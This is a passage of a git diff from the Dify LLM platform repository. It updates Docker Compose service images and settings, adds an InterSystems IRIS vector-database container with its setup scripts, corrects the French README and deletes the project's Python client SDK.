-736,11 +801,12 @@ services: # Frontend web application. web: - image: langgenius/dify-web:1.10.1-fix.1 + image: langgenius/dify-web:1.11.1 restart: always environment: CONSOLE_API_URL: ${CONSOLE_API_URL:-} APP_API_URL: ${APP_API_URL:-} + AMPLITUDE_API_KEY: ${AMPLITUDE_API_KEY:-} NEXT_PUBLIC_COOKIE_DOMAIN: ${NEXT_PUBLIC_COOKIE_DOMAIN:-} SENTRY_DSN: ${WEB_SENTRY_DSN:-} NEXT_TELEMETRY_DISABLED: ${NEXT_TELEMETRY_DISABLED:-0} @@ -873,7 +939,7 @@ services: # plugin daemon plugin_daemon: - image: langgenius/dify-plugin-daemon:0.4.1-local + image: langgenius/dify-plugin-daemon:0.5.1-local restart: always environment: # Use the shared environment variables. @@ -1018,7 +1084,7 @@ services: # and modify the env vars below in .env if HTTPS_ENABLED is true. 
NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -1056,6 +1122,9 @@ services: AUTHORIZATION_ADMINLIST_ENABLED: ${WEAVIATE_AUTHORIZATION_ADMINLIST_ENABLED:-true} AUTHORIZATION_ADMINLIST_USERS: ${WEAVIATE_AUTHORIZATION_ADMINLIST_USERS:-hello@dify.ai} DISABLE_TELEMETRY: ${WEAVIATE_DISABLE_TELEMETRY:-false} + ENABLE_TOKENIZER_GSE: ${WEAVIATE_ENABLE_TOKENIZER_GSE:-false} + ENABLE_TOKENIZER_KAGOME_JA: ${WEAVIATE_ENABLE_TOKENIZER_KAGOME_JA:-false} + ENABLE_TOKENIZER_KAGOME_KR: ${WEAVIATE_ENABLE_TOKENIZER_KAGOME_KR:-false} # OceanBase vector database oceanbase: @@ -1249,6 +1318,26 @@ services: CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} + # InterSystems IRIS vector database + iris: + image: containers.intersystems.com/intersystems/iris-community:2025.3 + profiles: + - iris + container_name: iris + restart: always + init: true + ports: + - "${IRIS_SUPER_SERVER_PORT:-1972}:1972" + - "${IRIS_WEB_SERVER_PORT:-52773}:52773" + volumes: + - ./volumes/iris:/opt/iris + - ./iris/iris-init.script:/iris-init.script + - ./iris/docker-entrypoint.sh:/custom-entrypoint.sh + entrypoint: ["/custom-entrypoint.sh"] + tty: true + environment: + TZ: ${IRIS_TIMEZONE:-UTC} + # Oracle vector database oracle: image: container-registry.oracle.com/database/free:latest diff --git a/docker/iris/docker-entrypoint.sh b/docker/iris/docker-entrypoint.sh new file mode 100755 index 0000000000..067bfa03e2 --- /dev/null +++ b/docker/iris/docker-entrypoint.sh @@ -0,0 +1,38 @@ +#!/bin/bash +set -e + +# IRIS configuration flag file +IRIS_CONFIG_DONE="/opt/iris/.iris-configured" + +# Function to configure IRIS +configure_iris() { + echo "Configuring IRIS for first-time setup..." + + # Wait for IRIS to be fully started + sleep 5 + + # Execute the initialization script + iris session IRIS < /iris-init.script + + # Mark configuration as done + touch "$IRIS_CONFIG_DONE" + + echo "IRIS configuration completed." +} + +# Start IRIS in background for initial configuration if not already configured +if [ ! -f "$IRIS_CONFIG_DONE" ]; then + echo "First-time IRIS setup detected. Starting IRIS for configuration..." 
+ + # Start IRIS + iris start IRIS + + # Configure IRIS + configure_iris + + # Stop IRIS + iris stop IRIS quietly +fi + +# Run the original IRIS entrypoint +exec /iris-main "$@" diff --git a/docker/iris/iris-init.script b/docker/iris/iris-init.script new file mode 100644 index 0000000000..c41fcf4efb --- /dev/null +++ b/docker/iris/iris-init.script @@ -0,0 +1,11 @@ +// Switch to the %SYS namespace to modify system settings +set $namespace="%SYS" + +// Set predefined user passwords to never expire (default password: SYS) +Do ##class(Security.Users).UnExpireUserPasswords("*") + +// Change the default password  +Do $SYSTEM.Security.ChangePassword("_SYSTEM","Dify@1234") + +// Install the Japanese locale (default is English since the container is Ubuntu-based) +// Do ##class(Config.NLS.Locales).Install("jpuw") diff --git a/docker/middleware.env.example b/docker/middleware.env.example index d4cbcd1762..f7e0252a6f 100644 --- a/docker/middleware.env.example +++ b/docker/middleware.env.example @@ -213,3 +213,24 @@ PLUGIN_VOLCENGINE_TOS_ENDPOINT= PLUGIN_VOLCENGINE_TOS_ACCESS_KEY= PLUGIN_VOLCENGINE_TOS_SECRET_KEY= PLUGIN_VOLCENGINE_TOS_REGION= + +# ------------------------------ +# Environment Variables for Aliyun SLS (Simple Log Service) +# ------------------------------ +# Aliyun SLS Access Key ID +ALIYUN_SLS_ACCESS_KEY_ID= +# Aliyun SLS Access Key Secret +ALIYUN_SLS_ACCESS_KEY_SECRET= +# Aliyun SLS Endpoint (e.g., cn-hangzhou.log.aliyuncs.com) +ALIYUN_SLS_ENDPOINT= +# Aliyun SLS Region (e.g., cn-hangzhou) +ALIYUN_SLS_REGION= +# Aliyun SLS Project Name +ALIYUN_SLS_PROJECT_NAME= +# Aliyun SLS Logstore TTL (default: 365 days, 3650 for permanent storage) +ALIYUN_SLS_LOGSTORE_TTL=365 +# Enable dual-write to both LogStore and SQL database (default: true) +LOGSTORE_DUAL_WRITE_ENABLED=true +# Enable dual-read fallback to SQL database when LogStore returns no results (default: true) +# Useful for migration scenarios where historical data exists only in SQL database +LOGSTORE_DUAL_READ_ENABLED=true \ No newline at end of file diff --git a/docs/fr-FR/README.md b/docs/fr-FR/README.md index 03f3221798..291c8dab40 100644 --- a/docs/fr-FR/README.md +++ b/docs/fr-FR/README.md @@ -61,14 +61,14 @@

langgenius%2Fdify | Trendshift

-Dify est une plateforme de développement d'applications LLM open source. Sa interface intuitive combine un flux de travail d'IA, un pipeline RAG, des capacités d'agent, une gestion de modèles, des fonctionnalités d'observabilité, et plus encore, vous permettant de passer rapidement du prototype à la production. Voici une liste des fonctionnalités principales: +Dify est une plateforme de développement d'applications LLM open source. Son interface intuitive combine un flux de travail d'IA, un pipeline RAG, des capacités d'agent, une gestion de modèles, des fonctionnalités d'observabilité, et plus encore, vous permettant de passer rapidement du prototype à la production. Voici une liste des fonctionnalités principales:

**1. Flux de travail** : Construisez et testez des flux de travail d'IA puissants sur un canevas visuel, en utilisant toutes les fonctionnalités suivantes et plus encore. **2. Prise en charge complète des modèles** : -Intégration transparente avec des centaines de LLM propriétaires / open source provenant de dizaines de fournisseurs d'inférence et de solutions auto-hébergées, couvrant GPT, Mistral, Llama3, et tous les modèles compatibles avec l'API OpenAI. Une liste complète des fournisseurs de modèles pris en charge se trouve [ici](https://docs.dify.ai/getting-started/readme/model-providers). +Intégration transparente avec des centaines de LLM propriétaires / open source offerts par des dizaines de fournisseurs d'inférence et de solutions auto-hébergées, couvrant GPT, Mistral, Llama3, et tous les modèles compatibles avec l'API OpenAI. Une liste complète des fournisseurs de modèles pris en charge se trouve [ici](https://docs.dify.ai/getting-started/readme/model-providers). ![providers-v5](https://github.com/langgenius/dify/assets/13230914/5a17bdbe-097a-4100-8363-40255b70f6e3) @@ -79,7 +79,7 @@ Interface intuitive pour créer des prompts, comparer les performances des modè Des capacités RAG étendues qui couvrent tout, de l'ingestion de documents à la récupération, avec un support prêt à l'emploi pour l'extraction de texte à partir de PDF, PPT et autres formats de document courants. **5. Capacités d'agent** : -Vous pouvez définir des agents basés sur l'appel de fonction LLM ou ReAct, et ajouter des outils pré-construits ou personnalisés pour l'agent. Dify fournit plus de 50 outils intégrés pour les agents d'IA, tels que la recherche Google, DALL·E, Stable Diffusion et WolframAlpha. +Vous pouvez définir des agents basés sur l'appel de fonctions LLM ou ReAct, et ajouter des outils pré-construits ou personnalisés pour l'agent. Dify fournit plus de 50 outils intégrés pour les agents d'IA, tels que la recherche Google, DALL·E, Stable Diffusion et WolframAlpha. **6. LLMOps** : Surveillez et analysez les journaux d'application et les performances au fil du temps. Vous pouvez continuellement améliorer les prompts, les ensembles de données et les modèles en fonction des données de production et des annotations. diff --git a/sdks/python-client/LICENSE b/sdks/python-client/LICENSE deleted file mode 100644 index 873e44b4bc..0000000000 --- a/sdks/python-client/LICENSE +++ /dev/null @@ -1,21 +0,0 @@ -MIT License - -Copyright (c) 2023 LangGenius - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE.
diff --git a/sdks/python-client/MANIFEST.in b/sdks/python-client/MANIFEST.in deleted file mode 100644 index 34b7e8711c..0000000000 --- a/sdks/python-client/MANIFEST.in +++ /dev/null @@ -1,3 +0,0 @@ -recursive-include dify_client *.py -include README.md -include LICENSE diff --git a/sdks/python-client/README.md b/sdks/python-client/README.md deleted file mode 100644 index ebfb5f5397..0000000000 --- a/sdks/python-client/README.md +++ /dev/null @@ -1,409 +0,0 @@ -# dify-client - -A Dify App Service-API Client, using for build a webapp by request Service-API - -## Usage - -First, install `dify-client` python sdk package: - -``` -pip install dify-client -``` - -### Synchronous Usage - -Write your code with sdk: - -- completion generate with `blocking` response_mode - -```python -from dify_client import CompletionClient - -api_key = "your_api_key" - -# Initialize CompletionClient -completion_client = CompletionClient(api_key) - -# Create Completion Message using CompletionClient -completion_response = completion_client.create_completion_message(inputs={"query": "What's the weather like today?"}, - response_mode="blocking", user="user_id") -completion_response.raise_for_status() - -result = completion_response.json() - -print(result.get('answer')) -``` - -- completion using vision model, like gpt-4-vision - -```python -from dify_client import CompletionClient - -api_key = "your_api_key" - -# Initialize CompletionClient -completion_client = CompletionClient(api_key) - -files = [{ - "type": "image", - "transfer_method": "remote_url", - "url": "your_image_url" -}] - -# files = [{ -# "type": "image", -# "transfer_method": "local_file", -# "upload_file_id": "your_file_id" -# }] - -# Create Completion Message using CompletionClient -completion_response = completion_client.create_completion_message(inputs={"query": "Describe the picture."}, - response_mode="blocking", user="user_id", files=files) -completion_response.raise_for_status() - -result = completion_response.json() - -print(result.get('answer')) -``` - -- chat generate with `streaming` response_mode - -```python -import json -from dify_client import ChatClient - -api_key = "your_api_key" - -# Initialize ChatClient -chat_client = ChatClient(api_key) - -# Create Chat Message using ChatClient -chat_response = chat_client.create_chat_message(inputs={}, query="Hello", user="user_id", response_mode="streaming") -chat_response.raise_for_status() - -for line in chat_response.iter_lines(decode_unicode=True): - line = line.split('data:', 1)[-1] - if line.strip(): - line = json.loads(line.strip()) - print(line.get('answer')) -``` - -- chat using vision model, like gpt-4-vision - -```python -from dify_client import ChatClient - -api_key = "your_api_key" - -# Initialize ChatClient -chat_client = ChatClient(api_key) - -files = [{ - "type": "image", - "transfer_method": "remote_url", - "url": "your_image_url" -}] - -# files = [{ -# "type": "image", -# "transfer_method": "local_file", -# "upload_file_id": "your_file_id" -# }] - -# Create Chat Message using ChatClient -chat_response = chat_client.create_chat_message(inputs={}, query="Describe the picture.", user="user_id", - response_mode="blocking", files=files) -chat_response.raise_for_status() - -result = chat_response.json() - -print(result.get("answer")) -``` - -- upload file when using vision model - -```python -from dify_client import DifyClient - -api_key = "your_api_key" - -# Initialize Client -dify_client = DifyClient(api_key) - -file_path = "your_image_file_path" -file_name = "panda.jpeg" -mime_type 
= "image/jpeg" - -with open(file_path, "rb") as file: - files = { - "file": (file_name, file, mime_type) - } - response = dify_client.file_upload("user_id", files) - - result = response.json() - print(f'upload_file_id: {result.get("id")}') -``` - -- Others - -```python -from dify_client import ChatClient - -api_key = "your_api_key" - -# Initialize Client -client = ChatClient(api_key) - -# Get App parameters -parameters = client.get_application_parameters(user="user_id") -parameters.raise_for_status() - -print('[parameters]') -print(parameters.json()) - -# Get Conversation List (only for chat) -conversations = client.get_conversations(user="user_id") -conversations.raise_for_status() - -print('[conversations]') -print(conversations.json()) - -# Get Message List (only for chat) -messages = client.get_conversation_messages(user="user_id", conversation_id="conversation_id") -messages.raise_for_status() - -print('[messages]') -print(messages.json()) - -# Rename Conversation (only for chat) -rename_conversation_response = client.rename_conversation(conversation_id="conversation_id", - name="new_name", user="user_id") -rename_conversation_response.raise_for_status() - -print('[rename result]') -print(rename_conversation_response.json()) -``` - -- Using the Workflow Client - -```python -import json -import requests -from dify_client import WorkflowClient - -api_key = "your_api_key" - -# Initialize Workflow Client -client = WorkflowClient(api_key) - -# Prepare parameters for Workflow Client -user_id = "your_user_id" -context = "previous user interaction / metadata" -user_prompt = "What is the capital of France?" - -inputs = { - "context": context, - "user_prompt": user_prompt, - # Add other input fields expected by your workflow (e.g., additional context, task parameters) - -} - -# Set response mode (default: streaming) -response_mode = "blocking" - -# Run the workflow -response = client.run(inputs=inputs, response_mode=response_mode, user=user_id) -response.raise_for_status() - -# Parse result -result = json.loads(response.text) - -answer = result.get("data").get("outputs") - -print(answer["answer"]) - -``` - -- Dataset Management - -```python -from dify_client import KnowledgeBaseClient - -api_key = "your_api_key" -dataset_id = "your_dataset_id" - -# Use context manager to ensure proper resource cleanup -with KnowledgeBaseClient(api_key, dataset_id) as kb_client: - # Get dataset information - dataset_info = kb_client.get_dataset() - dataset_info.raise_for_status() - print(dataset_info.json()) - - # Update dataset configuration - update_response = kb_client.update_dataset( - name="Updated Dataset Name", - description="Updated description", - indexing_technique="high_quality" - ) - update_response.raise_for_status() - print(update_response.json()) - - # Batch update document status - batch_response = kb_client.batch_update_document_status( - action="enable", - document_ids=["doc_id_1", "doc_id_2", "doc_id_3"] - ) - batch_response.raise_for_status() - print(batch_response.json()) -``` - -- Conversation Variables Management - -```python -from dify_client import ChatClient - -api_key = "your_api_key" - -# Use context manager to ensure proper resource cleanup -with ChatClient(api_key) as chat_client: - # Get all conversation variables - variables = chat_client.get_conversation_variables( - conversation_id="conversation_id", - user="user_id" - ) - variables.raise_for_status() - print(variables.json()) - - # Update a specific conversation variable - update_var = chat_client.update_conversation_variable( 
- conversation_id="conversation_id", - variable_id="variable_id", - value="new_value", - user="user_id" - ) - update_var.raise_for_status() - print(update_var.json()) -``` - -### Asynchronous Usage - -The SDK provides full async/await support for all API operations using `httpx.AsyncClient`. All async clients mirror their synchronous counterparts but require `await` for method calls. - -- async chat with `blocking` response_mode - -```python -import asyncio -from dify_client import AsyncChatClient - -api_key = "your_api_key" - -async def main(): - # Use async context manager for proper resource cleanup - async with AsyncChatClient(api_key) as client: - response = await client.create_chat_message( - inputs={}, - query="Hello, how are you?", - user="user_id", - response_mode="blocking" - ) - response.raise_for_status() - result = response.json() - print(result.get('answer')) - -# Run the async function -asyncio.run(main()) -``` - -- async completion with `streaming` response_mode - -```python -import asyncio -import json -from dify_client import AsyncCompletionClient - -api_key = "your_api_key" - -async def main(): - async with AsyncCompletionClient(api_key) as client: - response = await client.create_completion_message( - inputs={"query": "What's the weather?"}, - response_mode="streaming", - user="user_id" - ) - response.raise_for_status() - - # Stream the response - async for line in response.aiter_lines(): - if line.startswith('data:'): - data = line[5:].strip() - if data: - chunk = json.loads(data) - print(chunk.get('answer', ''), end='', flush=True) - -asyncio.run(main()) -``` - -- async workflow execution - -```python -import asyncio -from dify_client import AsyncWorkflowClient - -api_key = "your_api_key" - -async def main(): - async with AsyncWorkflowClient(api_key) as client: - response = await client.run( - inputs={"query": "What is machine learning?"}, - response_mode="blocking", - user="user_id" - ) - response.raise_for_status() - result = response.json() - print(result.get("data").get("outputs")) - -asyncio.run(main()) -``` - -- async dataset management - -```python -import asyncio -from dify_client import AsyncKnowledgeBaseClient - -api_key = "your_api_key" -dataset_id = "your_dataset_id" - -async def main(): - async with AsyncKnowledgeBaseClient(api_key, dataset_id) as kb_client: - # Get dataset information - dataset_info = await kb_client.get_dataset() - dataset_info.raise_for_status() - print(dataset_info.json()) - - # List documents - docs = await kb_client.list_documents(page=1, page_size=10) - docs.raise_for_status() - print(docs.json()) - -asyncio.run(main()) -``` - -**Benefits of Async Usage:** - -- **Better Performance**: Handle multiple concurrent API requests efficiently -- **Non-blocking I/O**: Don't block the event loop during network operations -- **Scalability**: Ideal for applications handling many simultaneous requests -- **Modern Python**: Leverages Python's native async/await syntax - -**Available Async Clients:** - -- `AsyncDifyClient` - Base async client -- `AsyncChatClient` - Async chat operations -- `AsyncCompletionClient` - Async completion operations -- `AsyncWorkflowClient` - Async workflow operations -- `AsyncKnowledgeBaseClient` - Async dataset/knowledge base operations -- `AsyncWorkspaceClient` - Async workspace operations - -``` -``` diff --git a/sdks/python-client/build.sh b/sdks/python-client/build.sh deleted file mode 100755 index 525f57c1ef..0000000000 --- a/sdks/python-client/build.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash - -set -e - -rm 
-rf build dist *.egg-info - -pip install setuptools wheel twine -python setup.py sdist bdist_wheel -twine upload dist/* diff --git a/sdks/python-client/dify_client/__init__.py b/sdks/python-client/dify_client/__init__.py deleted file mode 100644 index ced093b20a..0000000000 --- a/sdks/python-client/dify_client/__init__.py +++ /dev/null @@ -1,34 +0,0 @@ -from dify_client.client import ( - ChatClient, - CompletionClient, - DifyClient, - KnowledgeBaseClient, - WorkflowClient, - WorkspaceClient, -) - -from dify_client.async_client import ( - AsyncChatClient, - AsyncCompletionClient, - AsyncDifyClient, - AsyncKnowledgeBaseClient, - AsyncWorkflowClient, - AsyncWorkspaceClient, -) - -__all__ = [ - # Synchronous clients - "ChatClient", - "CompletionClient", - "DifyClient", - "KnowledgeBaseClient", - "WorkflowClient", - "WorkspaceClient", - # Asynchronous clients - "AsyncChatClient", - "AsyncCompletionClient", - "AsyncDifyClient", - "AsyncKnowledgeBaseClient", - "AsyncWorkflowClient", - "AsyncWorkspaceClient", -] diff --git a/sdks/python-client/dify_client/async_client.py b/sdks/python-client/dify_client/async_client.py deleted file mode 100644 index 23126cf326..0000000000 --- a/sdks/python-client/dify_client/async_client.py +++ /dev/null @@ -1,2074 +0,0 @@ -"""Asynchronous Dify API client. - -This module provides async/await support for all Dify API operations using httpx.AsyncClient. -All client classes mirror their synchronous counterparts but require `await` for method calls. - -Example: - import asyncio - from dify_client import AsyncChatClient - - async def main(): - async with AsyncChatClient(api_key="your-key") as client: - response = await client.create_chat_message( - inputs={}, - query="Hello", - user="user-123" - ) - print(response.json()) - - asyncio.run(main()) -""" - -import json -import os -from typing import Literal, Dict, List, Any, IO, Optional, Union - -import aiofiles -import httpx - - -class AsyncDifyClient: - """Asynchronous Dify API client. - - This client uses httpx.AsyncClient for efficient async connection pooling. - It's recommended to use this client as a context manager: - - Example: - async with AsyncDifyClient(api_key="your-key") as client: - response = await client.get_app_info() - """ - - def __init__( - self, - api_key: str, - base_url: str = "https://api.dify.ai/v1", - timeout: float = 60.0, - ): - """Initialize the async Dify client. - - Args: - api_key: Your Dify API key - base_url: Base URL for the Dify API - timeout: Request timeout in seconds (default: 60.0) - """ - self.api_key = api_key - self.base_url = base_url - self._client = httpx.AsyncClient( - base_url=base_url, - timeout=httpx.Timeout(timeout, connect=5.0), - ) - - async def __aenter__(self): - """Support async context manager protocol.""" - return self - - async def __aexit__(self, exc_type, exc_val, exc_tb): - """Clean up resources when exiting async context.""" - await self.aclose() - - async def aclose(self): - """Close the async HTTP client and release resources.""" - if hasattr(self, "_client"): - await self._client.aclose() - - async def _send_request( - self, - method: str, - endpoint: str, - json: Dict | None = None, - params: Dict | None = None, - stream: bool = False, - **kwargs, - ): - """Send an async HTTP request to the Dify API. 
- - Args: - method: HTTP method (GET, POST, PUT, PATCH, DELETE) - endpoint: API endpoint path - json: JSON request body - params: Query parameters - stream: Whether to stream the response - **kwargs: Additional arguments to pass to httpx.request - - Returns: - httpx.Response object - """ - headers = { - "Authorization": f"Bearer {self.api_key}", - "Content-Type": "application/json", - } - - response = await self._client.request( - method, - endpoint, - json=json, - params=params, - headers=headers, - **kwargs, - ) - - return response - - async def _send_request_with_files(self, method: str, endpoint: str, data: dict, files: dict): - """Send an async HTTP request with file uploads. - - Args: - method: HTTP method (POST, PUT, etc.) - endpoint: API endpoint path - data: Form data - files: Files to upload - - Returns: - httpx.Response object - """ - headers = {"Authorization": f"Bearer {self.api_key}"} - - response = await self._client.request( - method, - endpoint, - data=data, - headers=headers, - files=files, - ) - - return response - - async def message_feedback(self, message_id: str, rating: Literal["like", "dislike"], user: str): - """Send feedback for a message.""" - data = {"rating": rating, "user": user} - return await self._send_request("POST", f"/messages/{message_id}/feedbacks", data) - - async def get_application_parameters(self, user: str): - """Get application parameters.""" - params = {"user": user} - return await self._send_request("GET", "/parameters", params=params) - - async def file_upload(self, user: str, files: dict): - """Upload a file.""" - data = {"user": user} - return await self._send_request_with_files("POST", "/files/upload", data=data, files=files) - - async def text_to_audio(self, text: str, user: str, streaming: bool = False): - """Convert text to audio.""" - data = {"text": text, "user": user, "streaming": streaming} - return await self._send_request("POST", "/text-to-audio", json=data) - - async def get_meta(self, user: str): - """Get metadata.""" - params = {"user": user} - return await self._send_request("GET", "/meta", params=params) - - async def get_app_info(self): - """Get basic application information including name, description, tags, and mode.""" - return await self._send_request("GET", "/info") - - async def get_app_site_info(self): - """Get application site information.""" - return await self._send_request("GET", "/site") - - async def get_file_preview(self, file_id: str): - """Get file preview by file ID.""" - return await self._send_request("GET", f"/files/{file_id}/preview") - - # App Configuration APIs - async def get_app_site_config(self, app_id: str): - """Get app site configuration. - - Args: - app_id: ID of the app - - Returns: - App site configuration - """ - url = f"/apps/{app_id}/site/config" - return await self._send_request("GET", url) - - async def update_app_site_config(self, app_id: str, config_data: Dict[str, Any]): - """Update app site configuration. - - Args: - app_id: ID of the app - config_data: Configuration data to update - - Returns: - Updated app site configuration - """ - url = f"/apps/{app_id}/site/config" - return await self._send_request("PUT", url, json=config_data) - - async def get_app_api_tokens(self, app_id: str): - """Get API tokens for an app. 
- - Args: - app_id: ID of the app - - Returns: - List of API tokens - """ - url = f"/apps/{app_id}/api-tokens" - return await self._send_request("GET", url) - - async def create_app_api_token(self, app_id: str, name: str, description: str | None = None): - """Create a new API token for an app. - - Args: - app_id: ID of the app - name: Name for the API token - description: Description for the API token (optional) - - Returns: - Created API token information - """ - data = {"name": name, "description": description} - url = f"/apps/{app_id}/api-tokens" - return await self._send_request("POST", url, json=data) - - async def delete_app_api_token(self, app_id: str, token_id: str): - """Delete an API token. - - Args: - app_id: ID of the app - token_id: ID of the token to delete - - Returns: - Deletion result - """ - url = f"/apps/{app_id}/api-tokens/{token_id}" - return await self._send_request("DELETE", url) - - -class AsyncCompletionClient(AsyncDifyClient): - """Async client for Completion API operations.""" - - async def create_completion_message( - self, - inputs: dict, - response_mode: Literal["blocking", "streaming"], - user: str, - files: Dict | None = None, - ): - """Create a completion message. - - Args: - inputs: Input variables for the completion - response_mode: Response mode ('blocking' or 'streaming') - user: User identifier - files: Optional files to include - - Returns: - httpx.Response object - """ - data = { - "inputs": inputs, - "response_mode": response_mode, - "user": user, - "files": files, - } - return await self._send_request( - "POST", - "/completion-messages", - data, - stream=(response_mode == "streaming"), - ) - - -class AsyncChatClient(AsyncDifyClient): - """Async client for Chat API operations.""" - - async def create_chat_message( - self, - inputs: dict, - query: str, - user: str, - response_mode: Literal["blocking", "streaming"] = "blocking", - conversation_id: str | None = None, - files: Dict | None = None, - ): - """Create a chat message. 
- - Args: - inputs: Input variables for the chat - query: User query/message - user: User identifier - response_mode: Response mode ('blocking' or 'streaming') - conversation_id: Optional conversation ID for context - files: Optional files to include - - Returns: - httpx.Response object - """ - data = { - "inputs": inputs, - "query": query, - "user": user, - "response_mode": response_mode, - "files": files, - } - if conversation_id: - data["conversation_id"] = conversation_id - - return await self._send_request( - "POST", - "/chat-messages", - data, - stream=(response_mode == "streaming"), - ) - - async def get_suggested(self, message_id: str, user: str): - """Get suggested questions for a message.""" - params = {"user": user} - return await self._send_request("GET", f"/messages/{message_id}/suggested", params=params) - - async def stop_message(self, task_id: str, user: str): - """Stop a running message generation.""" - data = {"user": user} - return await self._send_request("POST", f"/chat-messages/{task_id}/stop", data) - - async def get_conversations( - self, - user: str, - last_id: str | None = None, - limit: int | None = None, - pinned: bool | None = None, - ): - """Get list of conversations.""" - params = {"user": user, "last_id": last_id, "limit": limit, "pinned": pinned} - return await self._send_request("GET", "/conversations", params=params) - - async def get_conversation_messages( - self, - user: str, - conversation_id: str | None = None, - first_id: str | None = None, - limit: int | None = None, - ): - """Get messages from a conversation.""" - params = { - "user": user, - "conversation_id": conversation_id, - "first_id": first_id, - "limit": limit, - } - return await self._send_request("GET", "/messages", params=params) - - async def rename_conversation(self, conversation_id: str, name: str, auto_generate: bool, user: str): - """Rename a conversation.""" - data = {"name": name, "auto_generate": auto_generate, "user": user} - return await self._send_request("POST", f"/conversations/{conversation_id}/name", data) - - async def delete_conversation(self, conversation_id: str, user: str): - """Delete a conversation.""" - data = {"user": user} - return await self._send_request("DELETE", f"/conversations/{conversation_id}", data) - - async def audio_to_text(self, audio_file: Union[IO[bytes], tuple], user: str): - """Convert audio to text.""" - data = {"user": user} - files = {"file": audio_file} - return await self._send_request_with_files("POST", "/audio-to-text", data, files) - - # Annotation APIs - async def annotation_reply_action( - self, - action: Literal["enable", "disable"], - score_threshold: float, - embedding_provider_name: str, - embedding_model_name: str, - ): - """Enable or disable annotation reply feature.""" - data = { - "score_threshold": score_threshold, - "embedding_provider_name": embedding_provider_name, - "embedding_model_name": embedding_model_name, - } - return await self._send_request("POST", f"/apps/annotation-reply/{action}", json=data) - - async def get_annotation_reply_status(self, action: Literal["enable", "disable"], job_id: str): - """Get the status of an annotation reply action job.""" - return await self._send_request("GET", f"/apps/annotation-reply/{action}/status/{job_id}") - - async def list_annotations(self, page: int = 1, limit: int = 20, keyword: str | None = None): - """List annotations for the application.""" - params = {"page": page, "limit": limit, "keyword": keyword} - return await self._send_request("GET", "/apps/annotations", 
params=params) - - async def create_annotation(self, question: str, answer: str): - """Create a new annotation.""" - data = {"question": question, "answer": answer} - return await self._send_request("POST", "/apps/annotations", json=data) - - async def update_annotation(self, annotation_id: str, question: str, answer: str): - """Update an existing annotation.""" - data = {"question": question, "answer": answer} - return await self._send_request("PUT", f"/apps/annotations/{annotation_id}", json=data) - - async def delete_annotation(self, annotation_id: str): - """Delete an annotation.""" - return await self._send_request("DELETE", f"/apps/annotations/{annotation_id}") - - # Enhanced Annotation APIs - async def get_annotation_reply_job_status(self, action: str, job_id: str): - """Get status of an annotation reply action job.""" - url = f"/apps/annotation-reply/{action}/status/{job_id}" - return await self._send_request("GET", url) - - async def list_annotations_with_pagination(self, page: int = 1, limit: int = 20, keyword: str | None = None): - """List annotations for application with pagination.""" - params = {"page": page, "limit": limit} - if keyword: - params["keyword"] = keyword - return await self._send_request("GET", "/apps/annotations", params=params) - - async def create_annotation_with_response(self, question: str, answer: str): - """Create a new annotation with full response handling.""" - data = {"question": question, "answer": answer} - return await self._send_request("POST", "/apps/annotations", json=data) - - async def update_annotation_with_response(self, annotation_id: str, question: str, answer: str): - """Update an existing annotation with full response handling.""" - data = {"question": question, "answer": answer} - url = f"/apps/annotations/{annotation_id}" - return await self._send_request("PUT", url, json=data) - - async def delete_annotation_with_response(self, annotation_id: str): - """Delete an annotation with full response handling.""" - url = f"/apps/annotations/{annotation_id}" - return await self._send_request("DELETE", url) - - # Conversation Variables APIs - async def get_conversation_variables(self, conversation_id: str, user: str): - """Get all variables for a specific conversation. - - Args: - conversation_id: The conversation ID to query variables for - user: User identifier - - Returns: - Response from the API containing: - - variables: List of conversation variables with their values - - conversation_id: The conversation ID - """ - params = {"user": user} - url = f"/conversations/{conversation_id}/variables" - return await self._send_request("GET", url, params=params) - - async def update_conversation_variable(self, conversation_id: str, variable_id: str, value: Any, user: str): - """Update a specific conversation variable. 
-
-    async def update_conversation_variable(self, conversation_id: str, variable_id: str, value: Any, user: str):
-        """Update a specific conversation variable.
-
-        Args:
-            conversation_id: The conversation ID
-            variable_id: The variable ID to update
-            value: New value for the variable
-            user: User identifier
-
-        Returns:
-            Response from the API with updated variable information
-        """
-        data = {"value": value, "user": user}
-        url = f"/conversations/{conversation_id}/variables/{variable_id}"
-        return await self._send_request("PATCH", url, json=data)
-
-    # Enhanced Conversation Variable APIs
-    async def list_conversation_variables_with_pagination(
-        self, conversation_id: str, user: str, page: int = 1, limit: int = 20
-    ):
-        """List conversation variables with pagination."""
-        params = {"page": page, "limit": limit, "user": user}
-        url = f"/conversations/{conversation_id}/variables"
-        return await self._send_request("GET", url, params=params)
-
-    async def update_conversation_variable_with_response(
-        self, conversation_id: str, variable_id: str, user: str, value: Any
-    ):
